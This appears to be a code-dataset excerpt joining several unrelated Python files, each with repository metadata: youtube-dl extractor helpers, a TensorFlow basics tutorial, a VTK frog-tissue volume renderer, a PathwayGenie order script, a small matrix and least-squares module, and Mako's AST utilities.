regexes = self._og_regexes('video') + self._og_regexes('video:url')
if secure:
regexes = self._og_regexes('video:secure_url') + regexes
return self._html_search_regex(regexes, html, name, **kargs)
def _og_search_url(self, html, **kargs):
return self._og_search_property('url', html, **kargs)
def _html_search_meta(self, name, html, display_name=None, fatal=False, **kwargs):
if display_name is None:
display_name = name
return self._html_search_regex(
r'''(?isx)<meta
(?=[^>]+(?:itemprop|name|property)=(["\']?)%s\1)
[^>]+?content=(["\'])(?P<content>.*?)\2''' % re.escape(name),
html, display_name, fatal=fatal, group='content', **kwargs)
def _dc_search_uploader(self, html):
return self._html_search_meta('dc.creator', html, 'uploader')
def _rta_search(self, html):
# See http://www.rtalabel.org/index.php?content=howtofaq#single
if re.search(r'(?ix)<meta\s+name="rating"\s+'
r' content="RTA-5042-1996-1400-1577-RTA"',
html):
return 18
return 0
def _media_rating_search(self, html):
# See http://www.tjg-designs.com/WP/metadata-code-examples-adding-metadata-to-your-web-pages/
rating = self._html_search_meta('rating', html)
if not rating:
return None
RATING_TABLE = {
'safe for kids': 0,
'general': 8,
'14 years': 14,
'mature': 17,
'restricted': 19,
}
return RATING_TABLE.get(rating.lower(), None)
def _family_friendly_search(self, html):
# See http://schema.org/VideoObject
family_friendly = self._html_search_meta('isFamilyFriendly', html)
if not family_friendly:
return None
RATING_TABLE = {
'1': 0,
'true': 0,
'0': 18,
'false': 18,
}
return RATING_TABLE.get(family_friendly.lower(), None)
def _twitter_search_player(self, html):
return self._html_search_meta('twitter:player', html,
'twitter card player')
def _sort_formats(self, formats):
if not formats:
raise ExtractorError('No video formats found')
def _formats_key(f):
# TODO remove the following workaround
from ..utils import determine_ext
if not f.get('ext') and 'url' in f:
f['ext'] = determine_ext(f['url'])
preference = f.get('preference')
if preference is None:
proto = f.get('protocol')
if proto is None:
proto = compat_urllib_parse_urlparse(f.get('url', '')).scheme
preference = 0 if proto in ['http', 'https'] else -0.1
if f.get('ext') in ['f4f', 'f4m']: # Not yet supported
preference -= 0.5
if f.get('vcodec') == 'none': # audio only
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['aac', 'mp3', 'm4a', 'webm', 'ogg', 'opus']
else:
ORDER = ['webm', 'opus', 'ogg', 'mp3', 'aac', 'm4a']
ext_preference = 0
try:
audio_ext_preference = ORDER.index(f['ext'])
except ValueError:
audio_ext_preference = -1
else:
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['flv', 'mp4', 'webm']
else:
ORDER = ['webm', 'flv', 'mp4']
try:
ext_preference = ORDER.index(f['ext'])
except ValueError:
ext_preference = -1
audio_ext_preference = 0
return (
preference,
f.get('language_preference') if f.get('language_preference') is not None else -1,
f.get('quality') if f.get('quality') is not None else -1,
f.get('tbr') if f.get('tbr') is not None else -1,
f.get('filesize') if f.get('filesize') is not None else -1,
f.get('vbr') if f.get('vbr') is not None else -1,
f.get('height') if f.get('height') is not None else -1,
f.get('width') if f.get('width') is not None else -1,
ext_preference,
f.get('abr') if f.get('abr') is not None else -1,
audio_ext_preference,
f.get('fps') if f.get('fps') is not None else -1,
f.get('filesize_approx') if f.get('filesize_approx') is not None else -1,
f.get('source_preference') if f.get('source_preference') is not None else -1,
f.get('format_id'),
)
formats.sort(key=_formats_key)
def _check_formats(self, formats, video_id):
if formats:
formats[:] = filter(
lambda f: self._is_valid_url(
f['url'], video_id,
item='%s video format' % f.get('format_id') if f.get('format_id') else 'video'),
formats)
def _is_valid_url(self, url, video_id, item='video'):
try:
self._request_webpage(url, video_id, 'Checking %s URL' % item)
return True
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError):
self.report_warning(
'%s URL is invalid, skipping' % item, video_id)
return False
raise
def http_scheme(self):
""" Either "http:" or "https:", depending on the user's preferences """
return (
'http:'
if self._downloader.params.get('prefer_insecure', False)
else 'https:')
def _proto_relative_url(self, url, scheme=None):
if url is None:
return url
if url.startswith('//'):
if scheme is None:
scheme = self.http_scheme()
return scheme + url
else:
return url
def _sleep(self, timeout, video_id, msg_template=None):
if msg_template is None:
msg_template = '%(video_id)s: Waiting for %(timeout)s seconds'
msg = msg_template % {'video_id': video_id, 'timeout': timeout}
self.to_screen(msg)
time.sleep(timeout)
def _extract_f4m_formats(self, manifest_url, video_id, preference=None, f4m_id=None):
manifest = self._download_xml(
manifest_url, video_id, 'Downloading f4m manifest',
'Unable to download f4m manifest')
formats = []
manifest_version = '1.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/1.0}media')
if not media_nodes:
manifest_version = '2.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/2.0}media')
for i, media_el in enumerate(media_nodes):
if manifest_version == '2.0':
manifest_url = ('/'.join(manifest_url.split('/')[:-1]) + '/'
+ (media_el.attrib.get('href') or media_el.attrib.get('url')))
tbr = int_or_none(media_el.attrib.get('bitrate'))
formats.append({
'format_id': '-'.join(filter(None, [f4m_id, 'f4m-%d' % (i if tbr is None else tbr)])),
'url': manifest_url,
'ext': 'flv',
'tbr': tbr,
'width': int_or_none(media_el.attrib.get('width')),
'height': int_or_none(media_el.attrib.get('height')),
'preference': preference,
})
self._sort_formats(formats)
return formats
def _extract_m3u8_formats(self, m3u8_url, video_id, ext=None,
entry_protocol='m3u8', preference=None,
m3u8_id=None):
formats = [{
'format_id': '-'.join(filter(None, [m3u8_id, 'm3u8-meta'])),
'url': m3u8_url,
'ext': ext,
'protocol': 'm3u8',
'preference': -1,
'resolution': 'multiple',
'format_note': 'Quality selection URL',
}]
format_url = lambda u: (
u
if re.match(r'^https?://', u)
else compat_urlparse.urljoin(m3u8_url, u))
m3u8_doc = self._download_webpage(
m3u8_url, video_id,
note='Downloading m3u8 information',
errnote='Failed to download m3u8 information')
last_info = None
last_media = None
kv_rex = re.compile(
r'(?P<key>[a-zA-Z_-]+)=(?P<val>"[^"]+"|[^",]+)(?:,|$)')
for line in m3u8_doc.splitlines():
if line.startswith('#EXT-X-STREAM-INF:'):
last_info = {}
for m in kv_rex.finditer(line):
v = m.group('val')
if v.startswith('"'):
v = v[1:-1]
last_info[m.group('key')] = v
elif line.startswith('#EXT-X-MEDIA:'):
last_media = {}
for m in kv_rex.finditer(line):
v = m.group('val')
if v.startswith('"'):
v = v[1:-1]
last_media[m.group('key')] = v
elif line.startswith('#') or not line.strip():
continue
else:
if last_info is None:
formats.append({'url': format_url(line)})
continue
tbr = int_or_none(last_info.get('BANDWIDTH'), scale=1000)
f = {
'format_id': '-'.join(filter(None, [m3u8_id, 'm3u8-%d' % (tbr if tbr else len(formats))])),
'url': format_url(line.strip()),
'tbr': tbr,
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}
codecs = last_info.get('CODECS')
if codecs:
# TODO: looks like video codec is not always necessarily goes first
va_codecs = codecs.split(',')
if va_codecs[0]:
f['vcodec'] = va_codecs[0].partition('.')[0]
if len(va_codecs) > 1 and va_codecs[1]:
f['acodec'] = va_codecs[1].partition('.')[0]
resolution = last_info.get('RESOLUTION')
if resolution:
width_str, height_str = resolution.split('x')
f['width'] = int(width_str)
f['height'] = int(height_str)
if last_media is not None:
f['m3u8_media'] = last_media
last_media = None
formats.append(f)
last_info = {}
self._sort_formats(formats)
return formats
# TODO: improve extraction
def _extract_smil_formats(self, smil_url, video_id, fatal=True):
smil = self._download_xml(
smil_url, video_id, 'Downloading SMIL file',
'Unable to download SMIL file', fatal=fatal)
if smil is False:
assert not fatal
return []
base = smil.find('./head/meta').get('base')
formats = []
rtmp_count = 0
for video in smil.findall('./body/switch/video'):
src = video.get('src')
if not src:
continue
bitrate = int_or_none(video.get('system-bitrate') or video.get('systemBitrate'), 1000)
width = int_or_none(video.get('width'))
height = int_or_none(video.get('height'))
proto = video.get('proto')
if not proto:
if base:
if base.startswith('rtmp'):
proto = 'rtmp'
elif base.startswith('http'):
proto = 'http'
ext = video.get('ext')
if proto == 'm3u8':
formats.extend(self._extract_m3u8_formats(src, video_id, ext))
elif proto == 'rtmp':
rtmp_count += 1
streamer = video.get('streamer') or base
formats.append({
'url': streamer,
'play_path': src,
'ext': 'flv',
'format_id': 'rtmp-%d' % (rtmp_count if bitrate is None else bitrate),
'tbr': bitrate,
'width': width,
'height': height,
})
self._sort_formats(formats)
return formats
def _live_title(self, name):
""" Generate the title for a live video """
now = datetime.datetime.now()
now_str = now.strftime("%Y-%m-%d %H:%M")
return name + ' ' + now_str
def _int(self, v, name, fatal=False, **kwargs):
res = int_or_none(v, **kwargs)
if 'get_attr' in kwargs:
print(getattr(v, kwargs['get_attr']))
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _float(self, v, name, fatal=False, **kwargs):
res = float_or_none(v, **kwargs)
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _set_cookie(self, domain, name, value, expire_time=None):
cookie = compat_cookiejar.Cookie(
0, name, value, None, None, domain, None,
None, '/', True, False, expire_time, '', None, None, None)
self._downloader.cookiejar.set_cookie(cookie)
def get_testcases(self, include_onlymatching=False):
t = getattr(self, '_TEST', None)
if t:
assert not hasattr(self, '_TESTS'), \
'%s has _TEST and _TESTS' % type(self).__name__
tests = [t]
else:
tests = getattr(self, '_TESTS', [])
for t in tests:
if not include_onlymatching and t.get('only_matching', False):
continue
t['name'] = type(self).__name__[:-len('IE')]
yield t
def is_suitable(self, age_limit):
""" Test whether the extractor is generally suitable for the given
age limit (i.e. pornographic sites are not, all others usually are) """
any_restricted = False
for tc in self.get_testcases(include_onlymatching=False):
if 'playlist' in tc:
tc = tc['playlist'][0]
is_restricted = age_restricted(
tc.get('info_dict', {}).get('age_limit'), age_limit)
if not is_restricted:
return True
any_restricted = any_restricted or is_restricted
return not any_restricted
class SearchInfoExtractor(InfoExtractor):
"""
Base class for paged search queries extractors.
They accept urls in the format _SEARCH_KEY(|all|[0-9]):{query}
Instances should define _SEARCH_KEY and _MAX_RESULTS.
"""
@classmethod
def _make_valid_url(cls):
return r'%s(?P<prefix>|[1-9][0-9]*|all):(?P<query>[\s\S]+)' % cls._SEARCH_KEY
@classmethod
def suitable(cls, url):
return re.match(cls._make_valid_url(), url) is not None
def _real_extract(self, query):
mobj = re.match(self._make_valid_url(), query)
if mobj is None:
raise ExtractorError('Invalid search query "%s"' % query)
prefix = mobj.group('prefix')
query = mobj.group('query')
if prefix == '':
return self._get_n_results(query, 1)
elif prefix == 'all':
return self._get_n_results(query, self._MAX_RESULTS)
else:
n = int(prefix)
if n <= 0:
raise ExtractorError('invalid download number %s for query "%s"' % (n, query))
elif n > self._MAX_RESULTS:
self._downloader.report_warning('%s returns max %i results (you requested %i)' % (self._SEARCH_KEY, self._MAX_RESULTS, n))
n = self._MAX_RESULTS
return self._get_n_results(query, n)
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
raise NotImplementedError("This method must be implemented by subclasses")
@property
def SEARCH_KEY(self):
return self._SEARCH_KEY
|
marado/youtube-dl
|
youtube_dl/extractor/common.py
|
Python
|
unlicense
| 43,875
|
[
"VisIt"
] |
55126af7286036adec46b2f452918ad1508ed7b5178aa9e7203cb4866ec5fd03
|
"""Summary of tensorflow basics.
Parag K. Mital, Jan 2016."""
# %% Import tensorflow and pyplot
import tensorflow as tf
import matplotlib.pyplot as plt
# %% tf.Graph represents a collection of tf.Operations
# You can create operations by writing out equations.
# By default, there is a graph: tf.get_default_graph()
# and any new operations are added to this graph.
# The result of a tf.Operation is a tf.Tensor, which holds
# the values.
# %% First a tf.Tensor
n_values = 32
x = tf.linspace(-3.0, 3.0, n_values)
# %% Construct a tf.Session to execute the graph.
sess = tf.Session()
result = sess.run(x)
# %% Alternatively pass a session to the eval fn:
x.eval(session=sess)
# x.eval() does not work, as it requires a session!
# %% We can setup an interactive session if we don't
# want to keep passing the session around:
sess.close()
sess = tf.InteractiveSession()
# %% Now this will work!
x.eval()
# %% Now a tf.Operation
# We'll use our values from [-3, 3] to create a Gaussian Distribution
sigma = 1.0
mean = 0.0
z = (tf.exp(tf.neg(tf.pow(x - mean, 2.0) /
(2.0 * tf.pow(sigma, 2.0)))) *
(1.0 / (sigma * tf.sqrt(2.0 * 3.1415))))
# %% By default, new operations are added to the default Graph
assert z.graph is tf.get_default_graph()
# %% Execute the graph and plot the result
plt.plot(z.eval())
# %% We can find out the shape of a tensor like so:
print(z.get_shape())
# %% Or in a more friendly format
print(z.get_shape().as_list())
# %% Sometimes we may not know the shape of a tensor
# until it is computed in the graph. In that case
# we should use the tf.shape fn, which will return a
# Tensor which can be eval'ed, rather than a discrete
# value of tf.Dimension
print(tf.shape(z).eval())
# %% We can combine tensors like so:
print(tf.pack([tf.shape(z), tf.shape(z), [3], [4]]).eval())
# %% Let's multiply the two to get a 2d gaussian
z_2d = tf.matmul(tf.reshape(z, [n_values, 1]), tf.reshape(z, [1, n_values]))
# %% Execute the graph and store the value that `out` represents in `result`.
plt.imshow(z_2d.eval())
# %% For fun let's create a gabor patch:
x = tf.reshape(tf.sin(tf.linspace(-3.0, 3.0, n_values)), [n_values, 1])
y = tf.reshape(tf.ones_like(x), [1, n_values])
z = tf.mul(tf.matmul(x, y), z_2d)
plt.imshow(z.eval())
# %% We can also list all the operations of a graph:
ops = tf.get_default_graph().get_operations()
print([op.name for op in ops])
# %% Lets try creating a generic function for computing the same thing:
def gabor(n_values=32, sigma=1.0, mean=0.0):
x = tf.linspace(-3.0, 3.0, n_values)
z = (tf.exp(tf.neg(tf.pow(x - mean, 2.0) /
(2.0 * tf.pow(sigma, 2.0)))) *
(1.0 / (sigma * tf.sqrt(2.0 * 3.1415))))
gauss_kernel = tf.matmul(
tf.reshape(z, [n_values, 1]), tf.reshape(z, [1, n_values]))
x = tf.reshape(tf.sin(tf.linspace(-3.0, 3.0, n_values)), [n_values, 1])
y = tf.reshape(tf.ones_like(x), [1, n_values])
gabor_kernel = tf.mul(tf.matmul(x, y), gauss_kernel)
return gabor_kernel
# %% Confirm this does something:
plt.imshow(gabor().eval())
# %% And another function which can convolve
def convolve(img, W):
# The W matrix is only 2D
# But conv2d will need a tensor which is 4d:
# height x width x n_input x n_output
if len(W.get_shape()) == 2:
dims = W.get_shape().as_list() + [1, 1]
W = tf.reshape(W, dims)
if len(img.get_shape()) == 2:
# num x height x width x channels
dims = [1] + img.get_shape().as_list() + [1]
img = tf.reshape(img, dims)
elif len(img.get_shape()) == 3:
dims = [1] + img.get_shape().as_list()
img = tf.reshape(img, dims)
# if the image is 3 channels, then our convolution
# kernel needs to be repeated for each input channel
W = tf.concat(2, [W, W, W])
# Stride is how many values to skip for the dimensions of
# num, height, width, channels
convolved = tf.nn.conv2d(img, W,
strides=[1, 1, 1, 1], padding='SAME')
return convolved
# %% Load up an image:
from skimage import data
img = data.astronaut()
plt.imshow(img)
print(img.shape)
# %% Now create a placeholder for our graph which can store any input:
x = tf.placeholder(tf.float32, shape=img.shape)
# %% And a graph which can convolve our image with a gabor
out = convolve(x, gabor())
# %% Now send the image into the graph and compute the result
result = tf.squeeze(out).eval(feed_dict={x: img})
plt.imshow(result)
|
apoorva-sharma/deep-frame-interpolation
|
tensorflow_tutorials-master/python/01_basics.py
|
Python
|
mit
| 4,497
|
[
"Gaussian"
] |
77671f18e525da8a50129a07bf2f33883acf5ba345b7ef41bd4cd484c5df2642
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 16 14:27:37 2015
@author: Jaromir Camphuijsen (6042473) and Eva van Weel(10244743)
"""
import Tkinter, random
import vtk
from vtk.tk.vtkTkRenderWidget import vtkTkRenderWidget
from Tkinter import *
# Create the renderer and the GUI
class Tissue(object):
def __init__(self, name, val, colour):
self.name = name
self.val = val
self.R = colour[0]
self.G = colour[1]
self.B = colour[2]
self.opacity = 0
self.check = None
def setOpacity(self, v):
self.opacity = v
def setCheck(self, check):
self.check = check
def createOTF(tissues):
OTF = vtk.vtkPiecewiseFunction()
OTF.AddPoint(0, 0)
for t in tissues:
OTF.AddPoint(t.val - 0.5, 0)
OTF.AddPoint(t.val, t.opacity)
OTF.AddPoint(t.val + 0.5, 0)
OTF.AddPoint(17.0, 0)
return OTF
def createSkinOTF(tissues):
skinOTF = vtk.vtkPiecewiseFunction()
skinOTF.AddPoint(70, 0)
skinOTF.AddPoint(80, tissues[15].opacity *.5)
skinOTF.AddPoint(90, tissues[15].opacity *.5)
skinOTF.AddPoint(100.0, 0)
return skinOTF
def createCTF(tissues):
CTF = vtk.vtkColorTransferFunction()
for tissue in tissues:
CTF.AddRGBPoint(tissue.val, tissue.R, tissue.G, tissue.B)
return CTF
def createSkinCTF(tissues):
skinCTF = vtk.vtkColorTransferFunction()
skinCTF.AddRGBPoint(1, 0,0,0)
skinCTF.AddRGBPoint(2, tissues[15].R, tissues[15].G, tissues[15].B)
skinCTF.AddRGBPoint(255, tissues[15].R, tissues[15].G, tissues[15].B)
return skinCTF
def update(tissues, tissue, opacityDict):
tissue.setOpacity(opacityDict[tissue].get())
if tissue.name == "Skin":
print tissue.name
skinOTF = createSkinOTF(tissues)
skinVolumeProperty.SetScalarOpacity(skinOTF)
else:
OTF = createOTF(tissues)
volumeProperty.SetScalarOpacity(OTF)
renWin.Render()
def selectAllTissues(tissues):
for t in tissues:
t.check.select()
t.setOpacity(.1)
OTF = createOTF(tissues)
volumeProperty.SetScalarOpacity(OTF)
skinOTF = createSkinOTF(tissues)
skinVolumeProperty.SetScalarOpacity(skinOTF)
renWin.Render()
def deselectAllTissues(tissues):
for t in tissues:
t.check.deselect()
t.setOpacity(0)
OTF = createOTF(tissues)
volumeProperty.SetScalarOpacity(OTF)
skinOTF = createSkinOTF(tissues)
skinVolumeProperty.SetScalarOpacity(skinOTF)
renWin.Render()
if __name__ == "__main__":
tissues = [
Tissue("Blood", 1, [0.75, 0.0, 0.0]),
Tissue("Brain", 2, [0.65, 0.65, 0.6]),
Tissue("Duodenum", 3, [0.75, 0.75, 0.0]),
Tissue("Eye retina", 4, [1.0, 0.4, 0.0]),
Tissue("Eye white", 5, [1, 1, 1]),
Tissue("Heart", 6, [0.4, 0.0, 0.0]),
Tissue("Ileum", 7, [0.6, 0.3, 0.15]),
Tissue("Kidney", 8, [0.40, 0.3, 0.2]),
Tissue("Large intestine", 9, [0.80, 0.20, 0.20]),
Tissue("Liver", 10, [0.0, 1.0, 1.0]),
Tissue("Lung", 11, [0.1, 0.1, 0.1]),
Tissue("Nerve", 12, [0.0, 0.8, 0.3]),
Tissue("Skeleton", 13, [.9, .9, .9]),
Tissue("Spleen", 14, [0.75, 0.0, 0.85]),
Tissue("Stomach", 15, [0.6, 0.6, 0.2]),
Tissue("Skin", 16, [0.20, 0.40, 0.0])
]
root = Tkinter.Tk()
aRenderer = vtk.vtkRenderer()
aRenderer.GradientBackgroundOn()
aRenderer.SetBackground(0,0,0)
aRenderer.SetBackground2(0,0,.1)
renderWidget = vtkTkRenderWidget(root,width=800,height=600)
renderWidget.grid(column=0, rowspan=len(tissues) + 4)
renWin = renderWidget.GetRenderWindow()
renWin.AddRenderer(aRenderer)
aRenderer.SetBackground(1, 1, 1)
renWin.SetSize(600, 480)
reader = vtk.vtkImageReader()
reader.SetDataExtent(0,499,0,469,1,136)
reader.SetDataSpacing(1,1,1.5)
reader.SetDataScalarTypeToUnsignedChar()
reader.SetFilePattern("./WholeFrog/frogTissue.%s%03d.raw")
reader.Update()
readerSkin = vtk.vtkImageReader()
readerSkin.SetDataExtent(0,499,0,469,1,136)
readerSkin.SetDataSpacing(1,1,1.5)
readerSkin.SetDataScalarTypeToUnsignedChar()
readerSkin.SetFilePattern("./WholeFrog/frog.%s%03d.raw")
readerSkin.Update()
# create color transfer function (static)
CTF = createCTF(tissues)
skinCTF = createSkinCTF(tissues)
# create OTF (dynamic by changing checkboxes)
OTF = createOTF(tissues)
skinOTF = createSkinOTF(tissues)
# The property describes how the data will look
volumeProperty = vtk.vtkVolumeProperty()
volumeProperty.SetColor(CTF)
volumeProperty.SetScalarOpacity(OTF)
volumeProperty.SetInterpolationTypeToLinear()
skinVolumeProperty = vtk.vtkVolumeProperty()
skinVolumeProperty.SetColor(skinCTF)
skinVolumeProperty.SetScalarOpacity(skinOTF)
# skinVolumeProperty.ShadeOn()
skinVolumeProperty.SetInterpolationTypeToLinear()
# The mapper / ray cast function know how to render the data
compositeFunction = vtk.vtkVolumeRayCastCompositeFunction()
volumeMapper = vtk.vtkVolumeRayCastMapper()
volumeMapper.SetVolumeRayCastFunction(compositeFunction)
volumeMapper.SetInputConnection(reader.GetOutputPort())
skinCompositeFunction = vtk.vtkVolumeRayCastCompositeFunction()
skinVolumeMapper = vtk.vtkVolumeRayCastMapper()
skinVolumeMapper.SetVolumeRayCastFunction(skinCompositeFunction)
skinVolumeMapper.SetInputConnection(readerSkin.GetOutputPort())
# The volume holds the mapper and the property and
# can be used to position/orient the volume
volume = vtk.vtkVolume()
volume.SetMapper(volumeMapper)
volume.SetProperty(volumeProperty)
skinVolume = vtk.vtkVolume()
skinVolume.SetMapper(skinVolumeMapper)
skinVolume.SetProperty(skinVolumeProperty)
aRenderer.AddVolume(volume)
aRenderer.AddVolume(skinVolume)
aCamera = vtk.vtkCamera()
aRenderer.SetActiveCamera(aCamera)
aCamera.SetPosition(0,0,-1)
aCamera.Azimuth(-25)
aCamera.Roll(90)
aRenderer.ResetCamera() #Without this camera Reset, the actors will not
# be displayed on starting the visualization
aCamera.Dolly(1.3)
renWin.Render()
Label(root, text="""Choose tissue(s) to visualize:""", justify = LEFT, padx = 20).grid(row = 0, rowspan=2, column=1)
varDict = {}
for tissue in tissues:
varDict[tissue] = DoubleVar()
varDict[tissue].set(0)
bgColour = '#%02x%02x%02x' % (tissue.R * 255, tissue.G * 255, tissue.B * 255)
tissue.setCheck(Checkbutton(root, text=tissue.name, offvalue = 0, onvalue = .1, variable = varDict[tissue], bg= bgColour,
command=lambda tissue = tissue: update(tissues, tissue, varDict)))
tissue.check.grid(row=tissue.val + 3, column=1, columnspan = 2, sticky="w", padx = 10)
Button(root, text = "All Tissues", command=lambda tissues = tissues: selectAllTissues(tissues) ).grid(column=1, row=2, sticky="w")
Button(root, text = "No Tissues", command=lambda tissues = tissues: deselectAllTissues(tissues) ).grid(column=2, row=2, sticky="w")
root.mainloop()
|
JaroCamphuijsen/SVVR
|
Assignment 4/Assignment4.py
|
Python
|
gpl-2.0
| 7,185
|
[
"VTK"
] |
8e7ad64abde9ec7db9ef9ea55c7050cfd9f6264ff0f5641156939e5faf640795
|
'''
PathwayGenie (c) University of Manchester 2017
PathwayGenie is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
import sys
from assembly_genie.build import BuildGenieBase
def main(args):
'''main method.'''
genie = BuildGenieBase({'ice': {'url': args[0],
'username': args[1],
'password': args[2]},
'ice_ids': args[3:]})
entries = genie.get_order()
for entry in entries:
print '\t'.join([str(val) if val else '' for val in entry])
if __name__ == '__main__':
main(sys.argv[1:])
|
synbiochem/PathwayGenie
|
assembly_genie/order.py
|
Python
|
mit
| 705
|
[
"VisIt"
] |
0cc0be3206bbc40363069bc9652575aa5bdfc9137f87dbea70771d9673a8ffd6
|
'''
matrix.py
Basic operations with matrixes:
- multiply
- transpose
- invert
And a simple linear least squares solver,
performing a linear fit between two vectors
yi = a+b.xi
Revision History
rev Date Description
0.1 2013.02.13 first issue, basic insanity check
Rafael Rossi
RaRossi@external.technip.com
rossirafael@yahoo.com
'''
#importing deepcopy to copy list and make sure the
#original lists are not altered
from copy import deepcopy
'''
matrix A with m rows and n columns
matrix B with o rows and p columns
AB = A.B with m rows and o columns
constraint: n==o
'''
def mmult(A,B):
n=len(A)
m=len(A[0])
p=len(B)
o=len(B[0])
if not n==o: return 0
AB=[[0.0 for i in range(m)] for j in range(p)]
for i in range(m):
for j in range(p):
AB[j][i]=0.0
for k in range(n):
AB[j][i]+=A[k][i]*B[j][k]
return AB
'''
returns the transpose of a matrix
matrix A with m rows and n columns
'''
def transpose(A):
n=len(A)
m=len(A[0])
B=[[0.0 for i in range(n)] for j in range(m)]
for i in range(m):
for j in range(n):
B[i][j]=A[j][i]
return B
'''
returns the inverse of a *square* matrix
'''
def minverse(Ao):
A=deepcopy(Ao)
m = len(A)
if not m==len(A[0]): return 0
#create zero matrix
AI=[[0.0 for i in range(m)] for j in range(m)]
#fill identity matrix
for i in range(m): AI[i][i]=1.0
#invert - Gaussian elimination
for k in range(m):
for i in range(k,m):
tmp = 1.0 * A[k][i]
for j in range(k,m):
A[j][i] /= tmp
for j in range(m):
AI[j][i] /= tmp
for i in range(k+1,m):
for j in range(k,m):
A[j][i]-= A[j][k]
for j in range(m):
AI[j][i] -= AI[j][k]
for i in range(m-2, -1, -1):
for j in range(m-1, i, -1):
for k in range(m):
AI[k][i] -= A[j][i] * AI[k][j]
for k in range(m):
A[k][i] -= A[j][i]*A[k][j]
return AI
'''
perform linear least squares fit between
2 vectors xo and yo.
returns coefficients a and b such that
yoi = a+b.xoi
constraints: both xo and yo need to be a row
vector xo=[n,n,n,n] with same size.
'''
def leastsquares(xo,yo):
n=len(xo)
if not n==len(yo): return 0
y=[deepcopy(yo)]
x=[[1]*n,deepcopy(xo)]
return mmult(mmult(minverse(mmult(transpose(x),x)),transpose(x)),y)[0]
|
haphaeu/yoshimi
|
GumbleBootstrap/matrix.py
|
Python
|
lgpl-3.0
| 2,495
|
[
"Gaussian"
] |
ee4f374b31afc8bc0862fafeb7e919e9b17761cdf548c6f5d8b4cf52a6160a7e
|
# mako/ast.py
# Copyright (C) 2006-2015 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""utilities for analyzing expressions and blocks of Python
code, as well as generating Python from AST nodes"""
from mako import exceptions, pyparser, compat
import re
class PythonCode(object):
"""represents information about a string containing Python code"""
def __init__(self, code, **exception_kwargs):
self.code = code
# represents all identifiers which are assigned to at some point in
# the code
self.declared_identifiers = set()
# represents all identifiers which are referenced before their
# assignment, if any
self.undeclared_identifiers = set()
# note that an identifier can be in both the undeclared and declared
# lists.
# using AST to parse instead of using code.co_varnames,
# code.co_names has several advantages:
# - we can locate an identifier as "undeclared" even if
# its declared later in the same block of code
# - AST is less likely to break with version changes
# (for example, the behavior of co_names changed a little bit
# in python version 2.5)
if isinstance(code, compat.string_types):
expr = pyparser.parse(code.lstrip(), "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindIdentifiers(self, **exception_kwargs)
f.visit(expr)
class ArgumentList(object):
"""parses a fragment of code as a comma-separated list of expressions"""
def __init__(self, code, **exception_kwargs):
self.codeargs = []
self.args = []
self.declared_identifiers = set()
self.undeclared_identifiers = set()
if isinstance(code, compat.string_types):
if re.match(r"\S", code) and not re.match(r",\s*$", code):
# if theres text and no trailing comma, insure its parsed
# as a tuple by adding a trailing comma
code += ","
expr = pyparser.parse(code, "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindTuple(self, PythonCode, **exception_kwargs)
f.visit(expr)
class PythonFragment(PythonCode):
"""extends PythonCode to provide identifier lookups in partial control
statements
e.g.
for x in 5:
elif y==9:
except (MyException, e):
etc.
"""
def __init__(self, code, **exception_kwargs):
m = re.match(r'^(\w+)(?:\s+(.*?))?:\s*(#|$)', code.strip(), re.S)
if not m:
raise exceptions.CompileException(
"Fragment '%s' is not a partial control statement" %
code, **exception_kwargs)
if m.group(3):
code = code[:m.start(3)]
(keyword, expr) = m.group(1, 2)
if keyword in ['for', 'if', 'while']:
code = code + "pass"
elif keyword == 'try':
code = code + "pass\nexcept:pass"
elif keyword == 'elif' or keyword == 'else':
code = "if False:pass\n" + code + "pass"
elif keyword == 'except':
code = "try:pass\n" + code + "pass"
elif keyword == 'with':
code = code + "pass"
else:
raise exceptions.CompileException(
"Unsupported control keyword: '%s'" %
keyword, **exception_kwargs)
super(PythonFragment, self).__init__(code, **exception_kwargs)
class FunctionDecl(object):
"""function declaration"""
def __init__(self, code, allow_kwargs=True, **exception_kwargs):
self.code = code
expr = pyparser.parse(code, "exec", **exception_kwargs)
f = pyparser.ParseFunc(self, **exception_kwargs)
f.visit(expr)
if not hasattr(self, 'funcname'):
raise exceptions.CompileException(
"Code '%s' is not a function declaration" % code,
**exception_kwargs)
if not allow_kwargs and self.kwargs:
raise exceptions.CompileException(
"'**%s' keyword argument not allowed here" %
self.kwargnames[-1], **exception_kwargs)
def get_argument_expressions(self, as_call=False):
"""Return the argument declarations of this FunctionDecl as a printable
list.
By default the return value is appropriate for writing in a ``def``;
set `as_call` to true to build arguments to be passed to the function
instead (assuming locals with the same names as the arguments exist).
"""
namedecls = []
# Build in reverse order, since defaults and slurpy args come last
argnames = self.argnames[::-1]
kwargnames = self.kwargnames[::-1]
defaults = self.defaults[::-1]
kwdefaults = self.kwdefaults[::-1]
# Named arguments
if self.kwargs:
namedecls.append("**" + kwargnames.pop(0))
for name in kwargnames:
# Keyword-only arguments must always be used by name, so even if
# this is a call, print out `foo=foo`
if as_call:
namedecls.append("%s=%s" % (name, name))
elif kwdefaults:
default = kwdefaults.pop(0)
if default is None:
# The AST always gives kwargs a default, since you can do
# `def foo(*, a=1, b, c=3)`
namedecls.append(name)
else:
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
else:
namedecls.append(name)
# Positional arguments
if self.varargs:
namedecls.append("*" + argnames.pop(0))
for name in argnames:
if as_call or not defaults:
namedecls.append(name)
else:
default = defaults.pop(0)
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
namedecls.reverse()
return namedecls
@property
def allargnames(self):
return tuple(self.argnames) + tuple(self.kwargnames)
